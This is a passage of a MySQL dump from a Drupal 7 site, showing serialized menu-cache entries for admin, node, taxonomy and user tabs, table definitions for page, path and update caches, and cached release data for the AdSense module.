updates\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:82:\"Get a status report about available updates for your installed modules and themes.\";s:8:\"position\";s:0:\"\";s:6:\"weight\";s:3:\"-50\";s:12:\"include_file\";s:32:\"modules/update/update.report.inc\";}i:1;a:23:{s:4:\"path\";s:26:\"admin/reports/updates/list\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:47:\"a:1:{i:0;s:29:\"administer site configuration\";}\";s:13:\"page_callback\";s:13:\"update_status\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:2:\"15\";s:12:\"number_parts\";s:1:\"4\";s:7:\"context\";s:1:\"1\";s:10:\"tab_parent\";s:21:\"admin/reports/updates\";s:8:\"tab_root\";s:21:\"admin/reports/updates\";s:5:\"title\";s:4:\"List\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"140\";s:11:\"description\";s:0:\"\";s:8:\"position\";s:0:\"\";s:6:\"weight\";s:1:\"0\";s:12:\"include_file\";s:32:\"modules/update/update.report.inc\";}i:2;a:23:{s:4:\"path\";s:28:\"admin/reports/updates/update\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:21:\"update_manager_access\";s:16:\"access_arguments\";s:6:\"a:0:{}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:61:\"a:2:{i:0;s:26:\"update_manager_update_form\";i:1;s:6:\"report\";}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:2:\"15\";s:12:\"number_parts\";s:1:\"4\";s:7:\"context\";s:1:\"1\";s:10:\"tab_parent\";s:21:\"admin/reports/updates\";s:8:\"tab_root\";s:21:\"admin/reports/updates\";s:5:\"title\";s:6:\"Update\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:8:\"position\";s:0:\"\";s:6:\"weight\";s:2:\"10\";s:12:\"include_file\";s:33:\"modules/update/update.manager.inc\";}i:3;a:23:{s:4:\"path\";s:29:\"admin/reports/updates/install\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:21:\"update_manager_access\";s:16:\"access_arguments\";s:6:\"a:0:{}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:62:\"a:2:{i:0;s:27:\"update_manager_install_form\";i:1;s:6:\"report\";}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:2:\"15\";s:12:\"number_parts\";s:1:\"4\";s:7:\"context\";s:1:\"1\";s:10:\"tab_parent\";s:21:\"admin/reports/updates\";s:8:\"tab_root\";s:21:\"admin/reports/updates\";s:5:\"title\";s:27:\"Install new module or theme\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"388\";s:11:\"description\";s:0:\"\";s:8:\"position\";s:0:\"\";s:6:\"weight\";s:2:\"25\";s:12:\"include_file\";s:33:\"modules/update/update.manager.inc\";}i:4;a:23:{s:4:\"path\";s:30:\"admin/reports/updates/settings\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:47:\"a:1:{i:0;s:29:\"administer site configuration\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:33:\"a:1:{i:0;s:15:\"update_settings\";}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:2:\"15\";s:12:\"number_parts\";s:1:\"4\";s:7:\"context\";s:1:\"1\";s:10:\"tab_parent\";s:21:\"admin/reports/updates\";s:8:\"tab_root\";s:21:\"admin/reports/updates\";s:5:\"title\";s:8:\"Settings\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:8:\"position\";s:0:\"\";s:6:\"weight\";s:2:\"50\";s:12:\"include_file\";s:34:\"modules/update/update.settings.inc\";}}',0,1445543754,1),('local_tasks:admin/structure/block/manage/%/%','a:2:{i:0;a:23:{s:4:\"path\";s:32:\"admin/structure/block/manage/%/%\";s:14:\"load_functions\";s:18:\"a:2:{i:4;N;i:5;N;}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"administer blocks\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:55:\"a:3:{i:0;s:21:\"block_admin_configure\";i:1;i:4;i:2;i:5;}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:2:\"60\";s:12:\"number_parts\";s:1:\"6\";s:7:\"context\";s:1:\"0\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:32:\"admin/structure/block/manage/%/%\";s:5:\"title\";s:15:\"Configure block\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:8:\"position\";s:0:\"\";s:6:\"weight\";s:1:\"0\";s:12:\"include_file\";s:29:\"modules/block/block.admin.inc\";}i:1;a:23:{s:4:\"path\";s:39:\"admin/structure/block/manage/%/%/delete\";s:14:\"load_functions\";s:18:\"a:2:{i:4;N;i:5;N;}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"administer blocks\";}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:59:\"a:3:{i:0;s:25:\"block_custom_block_delete\";i:1;i:4;i:2;i:5;}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:3:\"121\";s:12:\"number_parts\";s:1:\"7\";s:7:\"context\";s:1:\"0\";s:10:\"tab_parent\";s:32:\"admin/structure/block/manage/%/%\";s:8:\"tab_root\";s:32:\"admin/structure/block/manage/%/%\";s:5:\"title\";s:12:\"Delete block\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:8:\"position\";s:0:\"\";s:6:\"weight\";s:1:\"0\";s:12:\"include_file\";s:29:\"modules/block/block.admin.inc\";}}',0,1447855413,1),('local_tasks:node','a:1:{i:0;a:23:{s:4:\"path\";s:4:\"node\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:32:\"a:1:{i:0;s:14:\"access content\";}\";s:13:\"page_callback\";s:17:\"node_page_default\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:1:\"1\";s:12:\"number_parts\";s:1:\"1\";s:7:\"context\";s:1:\"0\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:4:\"node\";s:5:\"title\";s:0:\"\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"0\";s:11:\"description\";s:0:\"\";s:8:\"position\";s:0:\"\";s:6:\"weight\";s:1:\"0\";s:12:\"include_file\";s:0:\"\";}}',0,1444940208,1),('local_tasks:node/%','a:5:{i:0;a:23:{s:4:\"path\";s:11:\"node/%/view\";s:14:\"load_functions\";s:26:\"a:1:{i:1;s:9:\"node_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"node_access\";s:16:\"access_arguments\";s:29:\"a:2:{i:0;s:4:\"view\";i:1;i:1;}\";s:13:\"page_callback\";s:14:\"node_page_view\";s:14:\"page_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:1:\"5\";s:12:\"number_parts\";s:1:\"3\";s:7:\"context\";s:1:\"1\";s:10:\"tab_parent\";s:6:\"node/%\";s:8:\"tab_root\";s:6:\"node/%\";s:5:\"title\";s:4:\"View\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"140\";s:11:\"description\";s:0:\"\";s:8:\"position\";s:0:\"\";s:6:\"weight\";s:3:\"-10\";s:12:\"include_file\";s:0:\"\";}i:1;a:23:{s:4:\"path\";s:6:\"node/%\";s:14:\"load_functions\";s:26:\"a:1:{i:1;s:9:\"node_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"node_access\";s:16:\"access_arguments\";s:29:\"a:2:{i:0;s:4:\"view\";i:1;i:1;}\";s:13:\"page_callback\";s:14:\"node_page_view\";s:14:\"page_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:1:\"2\";s:12:\"number_parts\";s:1:\"2\";s:7:\"context\";s:1:\"0\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:6:\"node/%\";s:5:\"title\";s:0:\"\";s:14:\"title_callback\";s:15:\"node_page_title\";s:15:\"title_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:8:\"position\";s:0:\"\";s:6:\"weight\";s:1:\"0\";s:12:\"include_file\";s:0:\"\";}i:2;a:23:{s:4:\"path\";s:11:\"node/%/edit\";s:14:\"load_functions\";s:26:\"a:1:{i:1;s:9:\"node_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"node_access\";s:16:\"access_arguments\";s:31:\"a:2:{i:0;s:6:\"update\";i:1;i:1;}\";s:13:\"page_callback\";s:14:\"node_page_edit\";s:14:\"page_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:1:\"5\";s:12:\"number_parts\";s:1:\"3\";s:7:\"context\";s:1:\"3\";s:10:\"tab_parent\";s:6:\"node/%\";s:8:\"tab_root\";s:6:\"node/%\";s:5:\"title\";s:4:\"Edit\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:8:\"position\";s:0:\"\";s:6:\"weight\";s:1:\"0\";s:12:\"include_file\";s:27:\"modules/node/node.pages.inc\";}i:3;a:23:{s:4:\"path\";s:16:\"node/%/revisions\";s:14:\"load_functions\";s:26:\"a:1:{i:1;s:9:\"node_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:21:\"_node_revision_access\";s:16:\"access_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:13:\"page_callback\";s:22:\"node_revision_overview\";s:14:\"page_arguments\";s:14:\"a:1:{i:0;i:1;}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:1:\"5\";s:12:\"number_parts\";s:1:\"3\";s:7:\"context\";s:1:\"1\";s:10:\"tab_parent\";s:6:\"node/%\";s:8:\"tab_root\";s:6:\"node/%\";s:5:\"title\";s:9:\"Revisions\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:8:\"position\";s:0:\"\";s:6:\"weight\";s:1:\"2\";s:12:\"include_file\";s:27:\"modules/node/node.pages.inc\";}i:4;a:23:{s:4:\"path\";s:12:\"node/%/track\";s:14:\"load_functions\";s:26:\"a:1:{i:1;s:9:\"node_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"access statistics\";}\";s:13:\"page_callback\";s:23:\"statistics_node_tracker\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:1:\"5\";s:12:\"number_parts\";s:1:\"3\";s:7:\"context\";s:1:\"1\";s:10:\"tab_parent\";s:6:\"node/%\";s:8:\"tab_root\";s:6:\"node/%\";s:5:\"title\";s:5:\"Track\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:8:\"position\";s:0:\"\";s:6:\"weight\";s:1:\"2\";s:12:\"include_file\";s:39:\"modules/statistics/statistics.pages.inc\";}}',0,1444940212,1),('local_tasks:taxonomy/term/%','a:3:{i:0;a:23:{s:4:\"path\";s:15:\"taxonomy/term/%\";s:14:\"load_functions\";s:36:\"a:1:{i:2;s:18:\"taxonomy_term_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:32:\"a:1:{i:0;s:14:\"access content\";}\";s:13:\"page_callback\";s:18:\"taxonomy_term_page\";s:14:\"page_arguments\";s:14:\"a:1:{i:0;i:2;}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:1:\"6\";s:12:\"number_parts\";s:1:\"3\";s:7:\"context\";s:1:\"0\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:15:\"taxonomy/term/%\";s:5:\"title\";s:13:\"Taxonomy term\";s:14:\"title_callback\";s:19:\"taxonomy_term_title\";s:15:\"title_arguments\";s:14:\"a:1:{i:0;i:2;}\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:8:\"position\";s:0:\"\";s:6:\"weight\";s:1:\"0\";s:12:\"include_file\";s:35:\"modules/taxonomy/taxonomy.pages.inc\";}i:1;a:23:{s:4:\"path\";s:20:\"taxonomy/term/%/view\";s:14:\"load_functions\";s:36:\"a:1:{i:2;s:18:\"taxonomy_term_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:32:\"a:1:{i:0;s:14:\"access content\";}\";s:13:\"page_callback\";s:18:\"taxonomy_term_page\";s:14:\"page_arguments\";s:14:\"a:1:{i:0;i:2;}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:2:\"13\";s:12:\"number_parts\";s:1:\"4\";s:7:\"context\";s:1:\"1\";s:10:\"tab_parent\";s:15:\"taxonomy/term/%\";s:8:\"tab_root\";s:15:\"taxonomy/term/%\";s:5:\"title\";s:4:\"View\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"140\";s:11:\"description\";s:0:\"\";s:8:\"position\";s:0:\"\";s:6:\"weight\";s:1:\"0\";s:12:\"include_file\";s:35:\"modules/taxonomy/taxonomy.pages.inc\";}i:2;a:23:{s:4:\"path\";s:20:\"taxonomy/term/%/edit\";s:14:\"load_functions\";s:36:\"a:1:{i:2;s:18:\"taxonomy_term_load\";}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:25:\"taxonomy_term_edit_access\";s:16:\"access_arguments\";s:14:\"a:1:{i:0;i:2;}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:50:\"a:3:{i:0;s:18:\"taxonomy_form_term\";i:1;i:2;i:2;N;}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:2:\"13\";s:12:\"number_parts\";s:1:\"4\";s:7:\"context\";s:1:\"1\";s:10:\"tab_parent\";s:15:\"taxonomy/term/%\";s:8:\"tab_root\";s:15:\"taxonomy/term/%\";s:5:\"title\";s:4:\"Edit\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:8:\"position\";s:0:\"\";s:6:\"weight\";s:2:\"10\";s:12:\"include_file\";s:35:\"modules/taxonomy/taxonomy.admin.inc\";}}',0,1444995772,1),('local_tasks:user','a:4:{i:0;a:23:{s:4:\"path\";s:4:\"user\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:1:\"1\";s:16:\"access_arguments\";s:6:\"a:0:{}\";s:13:\"page_callback\";s:9:\"user_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:1:\"1\";s:12:\"number_parts\";s:1:\"1\";s:7:\"context\";s:1:\"0\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:4:\"user\";s:5:\"title\";s:12:\"User account\";s:14:\"title_callback\";s:15:\"user_menu_title\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:8:\"position\";s:0:\"\";s:6:\"weight\";s:3:\"-10\";s:12:\"include_file\";s:27:\"modules/user/user.pages.inc\";}i:1;a:23:{s:4:\"path\";s:13:\"user/register\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:20:\"user_register_access\";s:16:\"access_arguments\";s:6:\"a:0:{}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:36:\"a:1:{i:0;s:18:\"user_register_form\";}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:1:\"3\";s:12:\"number_parts\";s:1:\"2\";s:7:\"context\";s:1:\"1\";s:10:\"tab_parent\";s:4:\"user\";s:8:\"tab_root\";s:4:\"user\";s:5:\"title\";s:18:\"Create new account\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:8:\"position\";s:0:\"\";s:6:\"weight\";s:1:\"0\";s:12:\"include_file\";s:0:\"\";}i:2;a:23:{s:4:\"path\";s:10:\"user/login\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:17:\"user_is_anonymous\";s:16:\"access_arguments\";s:6:\"a:0:{}\";s:13:\"page_callback\";s:9:\"user_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:1:\"3\";s:12:\"number_parts\";s:1:\"2\";s:7:\"context\";s:1:\"1\";s:10:\"tab_parent\";s:4:\"user\";s:8:\"tab_root\";s:4:\"user\";s:5:\"title\";s:6:\"Log in\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"140\";s:11:\"description\";s:0:\"\";s:8:\"position\";s:0:\"\";s:6:\"weight\";s:1:\"0\";s:12:\"include_file\";s:27:\"modules/user/user.pages.inc\";}i:3;a:23:{s:4:\"path\";s:13:\"user/password\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:1:\"1\";s:16:\"access_arguments\";s:6:\"a:0:{}\";s:13:\"page_callback\";s:15:\"drupal_get_form\";s:14:\"page_arguments\";s:26:\"a:1:{i:0;s:9:\"user_pass\";}\";s:17:\"delivery_callback\";s:0:\"\";s:3:\"fit\";s:1:\"3\";s:12:\"number_parts\";s:1:\"2\";s:7:\"context\";s:1:\"1\";s:10:\"tab_parent\";s:4:\"user\";s:8:\"tab_root\";s:4:\"user\";s:5:\"title\";s:20:\"Request new password\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"132\";s:11:\"description\";s:0:\"\";s:8:\"position\";s:0:\"\";s:6:\"weight\";s:1:\"0\";s:12:\"include_file\";s:27:\"modules/user/user.pages.inc\";}}',0,1444973651,1),('menu_custom','a:4:{s:9:\"main-menu\";a:3:{s:9:\"menu_name\";s:9:\"main-menu\";s:5:\"title\";s:9:\"Main menu\";s:11:\"description\";s:115:\"The Main menu is used on many sites to show the major sections of the site, often in a top navigation bar.\";}s:10:\"management\";a:3:{s:9:\"menu_name\";s:10:\"management\";s:5:\"title\";s:10:\"Management\";s:11:\"description\";s:69:\"The Management menu contains links for administrative tasks.\";}s:10:\"navigation\";a:3:{s:9:\"menu_name\";s:10:\"navigation\";s:5:\"title\";s:10:\"Navigation\";s:11:\"description\";s:150:\"The Navigation menu contains links intended for site visitors. Links are added to the Navigation menu automatically by some modules.\";}s:9:\"user-menu\";a:3:{s:9:\"menu_name\";s:9:\"user-menu\";s:5:\"title\";s:9:\"User menu\";s:11:\"description\";s:99:\"The User menu contains links related to the user\'s account, as well as the \'Log out\' link.\";}}',0,1444940208,1); /*!40000 ALTER TABLE `cache_menu` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `cache_page` -- DROP TABLE IF EXISTS `cache_page`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `cache_page` ( `cid` varchar(255) NOT NULL DEFAULT '' COMMENT 'Primary Key: Unique cache ID.', `data` longblob COMMENT 'A collection of data to cache.', `expire` int(11) NOT NULL DEFAULT '0' COMMENT 'A Unix timestamp indicating when the cache entry should expire, or 0 for never.', `created` int(11) NOT NULL DEFAULT '0' COMMENT 'A Unix timestamp indicating when the cache entry was created.', `serialized` smallint(6) NOT NULL DEFAULT '0' COMMENT 'A flag to indicate whether content is serialized (1) or not (0).', PRIMARY KEY (`cid`), KEY `expire` (`expire`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Cache table used to store compressed pages for anonymous...'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `cache_page` -- LOCK TABLES `cache_page` WRITE; /*!40000 ALTER TABLE `cache_page` DISABLE KEYS */; /*!40000 ALTER TABLE `cache_page` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `cache_path` -- DROP TABLE IF EXISTS `cache_path`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `cache_path` ( `cid` varchar(255) NOT NULL DEFAULT '' COMMENT 'Primary Key: Unique cache ID.', `data` longblob COMMENT 'A collection of data to cache.', `expire` int(11) NOT NULL DEFAULT '0' COMMENT 'A Unix timestamp indicating when the cache entry should expire, or 0 for never.', `created` int(11) NOT NULL DEFAULT '0' COMMENT 'A Unix timestamp indicating when the cache entry was created.', `serialized` smallint(6) NOT NULL DEFAULT '0' COMMENT 'A flag to indicate whether content is serialized (1) or not (0).', PRIMARY KEY (`cid`), KEY `expire` (`expire`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Cache table for path alias lookup.'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `cache_path` -- LOCK TABLES `cache_path` WRITE; /*!40000 ALTER TABLE `cache_path` DISABLE KEYS */; /*!40000 ALTER TABLE `cache_path` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `cache_update` -- DROP TABLE IF EXISTS `cache_update`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `cache_update` ( `cid` varchar(255) NOT NULL DEFAULT '' COMMENT 'Primary Key: Unique cache ID.', `data` longblob COMMENT 'A collection of data to cache.', `expire` int(11) NOT NULL DEFAULT '0' COMMENT 'A Unix timestamp indicating when the cache entry should expire, or 0 for never.', `created` int(11) NOT NULL DEFAULT '0' COMMENT 'A Unix timestamp indicating when the cache entry was created.', `serialized` smallint(6) NOT NULL DEFAULT '0' COMMENT 'A flag to indicate whether content is serialized (1) or not (0).', PRIMARY KEY (`cid`), KEY `expire` (`expire`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Cache table for the Update module to store information...'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `cache_update` -- LOCK TABLES `cache_update` WRITE; /*!40000 ALTER TABLE `cache_update` DISABLE KEYS */; INSERT INTO `cache_update` VALUES ('available_releases::adsense','a:11:{s:5:\"title\";s:7:\"AdSense\";s:10:\"short_name\";s:7:\"adsense\";s:4:\"type\";s:14:\"project_module\";s:11:\"api_version\";s:3:\"7.x\";s:17:\"recommended_major\";s:1:\"1\";s:16:\"supported_majors\";s:1:\"1\";s:13:\"default_major\";s:1:\"1\";s:14:\"project_status\";s:9:\"published\";s:4:\"link\";s:38:\"https://www.drupal.org/project/adsense\";s:5:\"terms\";s:31:\"\n \n \n \n \n \n \n \n \";s:8:\"releases\";a:6:{s:7:\"7.x-1.3\";a:13:{s:4:\"name\";s:15:\"adsense 7.x-1.3\";s:7:\"version\";s:7:\"7.x-1.3\";s:3:\"tag\";s:7:\"7.x-1.3\";s:13:\"version_major\";s:1:\"1\";s:13:\"version_patch\";s:1:\"3\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:35:\"https://www.drupal.org/node/2317345\";s:13:\"download_link\";s:59:\"http://ftp.drupal.org/files/projects/adsense-7.x-1.3.tar.gz\";s:4:\"date\";s:10:\"1407429228\";s:6:\"mdhash\";s:32:\"c15e188220e16a5e3e15994cb227f9fa\";s:8:\"filesize\";s:5:\"48652\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:2:{i:0;s:9:\"Bug fixes\";i:1;s:12:\"New features\";}}}s:7:\"7.x-1.2\";a:13:{s:4:\"name\";s:15:\"adsense 7.x-1.2\";s:7:\"version\";s:7:\"7.x-1.2\";s:3:\"tag\";s:7:\"7.x-1.2\";s:13:\"version_major\";s:1:\"1\";s:13:\"version_patch\";s:1:\"2\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:35:\"https://www.drupal.org/node/2201741\";s:13:\"download_link\";s:59:\"http://ftp.drupal.org/files/projects/adsense-7.x-1.2.tar.gz\";s:4:\"date\";s:10:\"1392941005\";s:6:\"mdhash\";s:32:\"8bec274bdf9ef4862a64bb839d04d544\";s:8:\"filesize\";s:5:\"47856\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:2:{i:0;s:9:\"Bug fixes\";i:1;s:12:\"New features\";}}}s:7:\"7.x-1.1\";a:13:{s:4:\"name\";s:15:\"adsense 7.x-1.1\";s:7:\"version\";s:7:\"7.x-1.1\";s:3:\"tag\";s:7:\"7.x-1.1\";s:13:\"version_major\";s:1:\"1\";s:13:\"version_patch\";s:1:\"1\";s:6:\"status\";s:9:\"published\";s:12:\"release_link\";s:35:\"https://www.drupal.org/node/2035125\";s:13:\"download_link\";s:59:\"http://ftp.drupal.org/files/projects/adsense-7.x-1.1.tar.gz\";s:4:\"date\";s:10:\"1372970151\";s:6:\"mdhash\";s:32:\"66d143c1119eef154df5c8d2f920ae48\";s:8:\"filesize\";s:5:\"48929\";s:5:\"files\";s:11:\"\n \n \n \";s:5:\"terms\";a:1:{s:12:\"Release type\";a:2:{i:0;s:12:\"New features\";i:1;s:9:\"Bug fixes\";}}}s:7:\"7.x-1.0\";a:13:{s:4:\"name\";s:15:\"adsense 